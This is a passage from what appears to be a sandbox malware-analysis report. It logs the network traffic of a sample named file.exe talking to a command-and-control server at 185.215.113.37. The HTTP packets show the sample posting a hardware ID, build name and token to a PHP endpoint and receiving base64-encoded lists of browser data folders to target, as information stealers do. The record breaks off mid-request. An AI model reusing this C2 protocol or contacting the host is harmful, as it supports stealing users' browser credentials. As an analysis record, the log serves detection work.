Oct 2, 2024 23:10:15.525506020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525513887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525522947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525531054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525541067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525549889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525551081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525559902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525568962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525577068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525584936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525618076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525763988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525774956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525784016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525815010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525840044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525876045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525887012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525893927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525902987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525911093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525919914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525924921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525929928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525938034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525947094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525955915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.525969028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.525995016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526480913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526490927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526499033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526506901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526516914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526525974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526534081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526537895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526544094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526552916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526561022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526568890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526572943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526577950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526587009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526596069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526604891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526607990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526613951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526623011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526632071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526638985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526642084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.526676893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.526698112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.527368069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527380943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527394056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527404070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527414083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527422905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527431011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527435064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.527441025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.527475119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.527499914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.561630964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.566773891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778594971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778620005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778630018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778639078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778647900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778656960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778666019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778675079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778685093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778693914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778697968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.778703928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778712988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778723001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778733015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.778733015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778800964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.778940916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778953075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778963089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.778995037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779012918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779095888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779105902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779115915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779126883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779138088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779139042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779149055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779160023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779160023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779170036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779181004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779191971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779213905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779239893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779553890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779566050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779575109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779586077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779596090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779607058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779608011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779616117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779680967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779870987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779881954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779891014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779901981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779911995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779920101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779931068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779942036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779951096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779953957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779962063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779972076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779979944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.779983997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.779994011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780004025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780014992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780019999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.780025959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780036926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780050993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.780051947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780076981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.780100107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.780874968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780888081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780898094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780908108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780917883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780926943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780939102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780949116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780956984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.780960083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780971050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780981064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.780991077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781002998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781013012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781017065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.781023026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781033993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781044960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781052113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.781058073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781085968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.781101942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:15.781440973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781454086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:15.781501055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:16.014530897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:16.014554977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:16.021604061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:16.022427082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.374944925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.375005007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.376151085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.376198053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.429456949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.445395947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.666349888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.666416883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.666840076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.667021990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.753415108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.753499985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.753554106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.753587961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.756865978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.761831045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.981472015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:17.981544018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.992552042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:17.998002052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.723861933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.723936081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.725155115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.725227118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.725830078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.725972891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.750911951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.756194115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.973534107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:19.973726988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.975426912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:19.980838060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:20.697164059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:20.697387934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:25.413208008 CEST	49704	80	192.168.2.5	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.37	80	6104	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 23:10:01.211451054 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 23:10:01.928697109 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:01.932809114 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 45 42 33 45 31 39 32 30 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="hwid"1CEB3E1920C22312027626------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="build"doma------IJKKKFCFHCFIECBGDHID--
Oct 2, 2024 23:10:02.173763990 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 47 59 77 4e 7a 51 34 59 7a 6b 30 4e 7a 63 77 59 7a 59 79 5a 6a 63 78 4e 7a 4e 6d 4d 6a 51 34 4d 44 63 31 4f 47 45 33 4e 57 4d 30 4d 7a 45 78 5a 44 49 31 59 7a 52 6b 59 6d 51 32 4d 57 51 32 4d 54 6b 32 4f 54 6b 30 4f 44 49 30 4e 54 67 78 4f 54 68 6c 4d 6a 55 77 4e 6a 45 32 4d 6d 49 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MGYwNzQ4Yzk0NzcwYzYyZjcxNzNmMjQ4MDc1OGE3NWM0MzExZDI1YzRkYmQ2MWQ2MTk2OTk0ODI0NTgxOThlMjUwNjE2MmI2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 2, 2024 23:10:02.174841881 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 2d 2d 0d 0a Data Ascii: ------BKFHCGIDBAAFHIDHDAAEContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------BKFHCGIDBAAFHIDHDAAEContent-Disposition: form-data; name="message"browsers------BKFHCGIDBAAFHIDHDAAE--
Oct 2, 2024 23:10:02.395694017 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 2, 2024 23:10:02.395869017 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 2, 2024 23:10:02.397031069 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 2d 2d 0d 0a Data Ascii: 